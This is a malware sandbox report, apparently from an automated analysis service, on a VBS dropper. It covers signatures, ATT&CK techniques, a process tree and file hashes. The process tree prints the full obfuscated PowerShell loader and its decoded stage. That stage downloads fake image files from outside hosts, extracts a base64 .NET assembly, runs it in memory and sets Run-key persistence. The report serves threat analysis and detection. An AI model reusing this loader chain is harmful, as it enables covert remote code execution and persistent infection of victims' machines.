a27befda630cf94fa78551c737d99b4a370b4cf03fa30cc66ecdb25abe7ffabf

Resubmissions

26/03/2024, 17:35

240326-v6awxaff78 10

Analysis

max time kernel
689s
max time network
580s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29/03/2024, 18:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

325445263.vbs
Size

5KB
MD5

8860415c7f6f62563e6a83f38f5e9c9e
SHA1

8506f5ee6f4d65207e953ccb98ee7fb97ab55526
SHA256

a27befda630cf94fa78551c737d99b4a370b4cf03fa30cc66ecdb25abe7ffabf
SHA512

551e2e7ebed72469ae66bccd060b02beb8d2b329ddd2860d42a2c133c180b7e3e343bf8b9b4d25a58858218f7cf1635f5095e40da433e443bdcc3c68a425efc3
SSDEEP

96:5Hnzts29Dto+D6obmWTCQKTJjn8fLGZ2kvaQKX99NcT:k8rmScJj8Q2kvMX9MT

Score

8^/10

persistence

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	4748	WScript.exe
5	4748	WScript.exe
11	4748	WScript.exe
20	2820	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\Name_File.vbs"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3292	Notepad.exe
2876	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4776	powershell.exe
4776	powershell.exe
2820	powershell.exe
2820	powershell.exe
3404	powershell.exe
3404	powershell.exe
4976	powershell.exe
4976	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeManageVolumePrivilege	4100	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3292	Notepad.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4748 wrote to memory of 4776	4748	WScript.exe	86
PID 4748 wrote to memory of 4776	4748	WScript.exe	86
PID 4776 wrote to memory of 2820	4776	powershell.exe	88
PID 4776 wrote to memory of 2820	4776	powershell.exe	88
PID 2820 wrote to memory of 3404	2820	powershell.exe	90
PID 2820 wrote to memory of 3404	2820	powershell.exe	90
PID 4976 wrote to memory of 1344	4976	powershell.exe	104
PID 4976 wrote to memory of 1344	4976	powershell.exe	104
PID 4976 wrote to memory of 3700	4976	powershell.exe	106
PID 4976 wrote to memory of 3700	4976	powershell.exe	106
PID 4976 wrote to memory of 556	4976	powershell.exe	107
PID 4976 wrote to memory of 556	4976	powershell.exe	107
PID 4976 wrote to memory of 3984	4976	powershell.exe	115
PID 4976 wrote to memory of 3984	4976	powershell.exe	115
PID 4976 wrote to memory of 2248	4976	powershell.exe	123
PID 4976 wrote to memory of 2248	4976	powershell.exe	123
PID 4976 wrote to memory of 3668	4976	powershell.exe	125
PID 4976 wrote to memory of 3668	4976	powershell.exe	125
PID 4976 wrote to memory of 1800	4976	powershell.exe	126
PID 4976 wrote to memory of 1800	4976	powershell.exe	126

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\325445263.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreHIDgTreYQBtDgTreC8DgTreSgBLDgTreC8DgTredgB0DgTreC4DgTreNDgTreBjDgTreGUDgTrecgDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreXwBGDgTreGkDgTrebDgTreBlDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ram/JK/vt.4cer.www//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
    3⤵
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3404

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2700

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\325445263.vbs
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:3292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976
- C:\Windows\system32\cscript.exe
  "C:\Windows\system32\cscript.exe" .\325445263.vbs
  2⤵
  PID:1344
- C:\Windows\system32\wscript.exe
  "C:\Windows\system32\wscript.exe" .\325445263.vbs
  2⤵
  PID:3700
- C:\Windows\system32\cscript.exe
  "C:\Windows\system32\cscript.exe" .\325445263.vbs
  2⤵
  PID:556
- C:\Windows\system32\cscript.exe
  "C:\Windows\system32\cscript.exe" .\325445263.vbs
  2⤵
  PID:3984
- C:\Windows\system32\cscript.exe
  "C:\Windows\system32\cscript.exe" .\325445263.vbs
  2⤵
  PID:2248
- C:\Windows\system32\cscript.exe
  "C:\Windows\system32\cscript.exe" .\325445263.vbs
  2⤵
  PID:3668
- C:\Windows\system32\cscript.exe
  "C:\Windows\system32\cscript.exe" .\325445263.vbs
  2⤵
  PID:1800

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\output.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2876

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:4884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\325445263.vbs

Filesize
5KB

MD5
24af1c2bbb07320dcde9f82f734de89e

SHA1
54bd174e6db1f8df6925944b2b35b0c047a5190e

SHA256
1b46dbeead7f107bfeb349079b1882c220c778a41816b3b46002a1002d0b1bac

SHA512
27a02ab08df6c0d43e909af653e9227749f941c1c3229e45e9f891957ed95726d5f7cd29ae3970c01d65f999a23be426e865d88d52f6fe9e1fdc5d20a768489c

Download Submit
C:\Users\Admin\AppData\Local\Temp\325445263.vbs

Filesize
5KB

MD5
6a1f68523a49d8f470982730ee8e52cb

SHA1
8755e0e18d6a4ae9374c8eefd079270f954e42ce

SHA256
60d47857dd53440c87897f846385ebd3d9837b2c6a4d5449f64bf4059ca2b784

SHA512
207972d685db5d4d4fe780b69beb64722b35488903af50e9e4692c944ba1a1029016da1c023fec904edccd3614cb6f9e7cee0afb5d052e381d1e38451b3ed5e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\325445263.vbs

Filesize
5KB

MD5
8a9c4dc5d93264629e485b4218ecada2

SHA1
5961084734fbf89e56fa52391998827626e250a6

SHA256
bba998359687fdea92f97329b868646e480ee206fd6d4b59854f91698a071f32

SHA512
c4552a2f618bb76201182fdde9ac4412cbe5e682e716c8eef3f12da393f9fe3eb670cfad048f44226f37b1c39296c96860bac9b171d4c96ec318c9f538411c68

Download Submit
C:\Users\Admin\AppData\Local\Temp\325445263.vbs

Filesize
5KB

MD5
d2bc6d0b9c9b784cca34f1ccd4c1ce60

SHA1
9cc233ef98f8945667bb0310f7091aa5ea561cac

SHA256
49e27bcad45a034ccd5d92768b487b772057b5d67fd4f72e54eb1a1bf71b222c

SHA512
622cc473b11dd1f474df36a168c64fbbac6e2717a306378866f7f4e1f323b68bc6dd6601bf14e85b7abe68cf6bb8d14ce7cd5dcf509b47d193e58887d1714d0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\325445263.vbs

Filesize
5KB

MD5
f6a14eddbadc45cc925c8b0c8ba55f9a

SHA1
88172d71825bd2433e216ab6a0798149deb8a4cc

SHA256
ddfcc37cf8a798f58bd7cd41ecfdf11aefc346ef2b3138367f18ad07a2c8e80f

SHA512
4be264f69ff934570292054d77d3b6c737f80965564ff6282db2f54e9b655c10b50a32b6526cc6962bfb701b672844a6f273499ff02f723f9ce62f21b1e2bed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\325445263.vbs

Filesize
5KB

MD5
0c9d87fe3f2582ec13abbd898ea168fb

SHA1
e9ed17fd4ca8fddcb45165fd90a8f6394c7ae3a5

SHA256
0bf917b6de452a32d2944ad6ed8ca0a7c0dea2473b79d33cdad834a23424ea28

SHA512
aff86ab11a2fedb8baacb5aec09e3fd52a2dffe4b3e37e97a03dcb3d1c48ead8bf02dbd1f702977040fed8820130b300f6c7075fb5df43dfdadd9f3786dbf9bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xvblonwo.zjc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\output.txt

Filesize
222B

MD5
2f554637bd5fe53eda8cf7eeb809c9c4

SHA1
3b4ba22dfe47a6f01d78fb91852c3998c35cf7cf

SHA256
18daa972430c69738fb4a930ce0676ed7aec1072d7ccae0d458b24ebb0aabc10

SHA512
a0b1b3c64c27f09751befd2b22398c98a9d7ae37442a71a5f7592d9fe6ee52b22de2152bfaaefefe31771480595016d9431d112f635f7edc7df871c2caccce88

Download Submit
memory/2820-23-0x0000023B6FA90000-0x0000023B6FAA0000-memory.dmp

Filesize
64KB

Download
memory/2820-34-0x0000023B7A440000-0x0000023B7A700000-memory.dmp

Filesize
2.8MB

Download
memory/2820-24-0x0000023B6FA90000-0x0000023B6FAA0000-memory.dmp

Filesize
64KB

Download
memory/2820-37-0x0000023B6FA90000-0x0000023B6FAA0000-memory.dmp

Filesize
64KB

Download
memory/2820-22-0x00007FFE11900000-0x00007FFE123C1000-memory.dmp

Filesize
10.8MB

Download
memory/2820-50-0x00007FFE11900000-0x00007FFE123C1000-memory.dmp

Filesize
10.8MB

Download
memory/3404-35-0x00007FFE11900000-0x00007FFE123C1000-memory.dmp

Filesize
10.8MB

Download
memory/3404-38-0x0000022D6C1B0000-0x0000022D6C1C0000-memory.dmp

Filesize
64KB

Download
memory/3404-58-0x00007FFE11900000-0x00007FFE123C1000-memory.dmp

Filesize
10.8MB

Download
memory/3404-36-0x0000022D6C1B0000-0x0000022D6C1C0000-memory.dmp

Filesize
64KB

Download
memory/4100-129-0x000001481E0B0000-0x000001481E0B1000-memory.dmp

Filesize
4KB

Download
memory/4100-130-0x000001481E1C0000-0x000001481E1C1000-memory.dmp

Filesize
4KB

Download
memory/4100-126-0x000001481E080000-0x000001481E081000-memory.dmp

Filesize
4KB

Download
memory/4100-110-0x0000014815D40000-0x0000014815D50000-memory.dmp

Filesize
64KB

Download
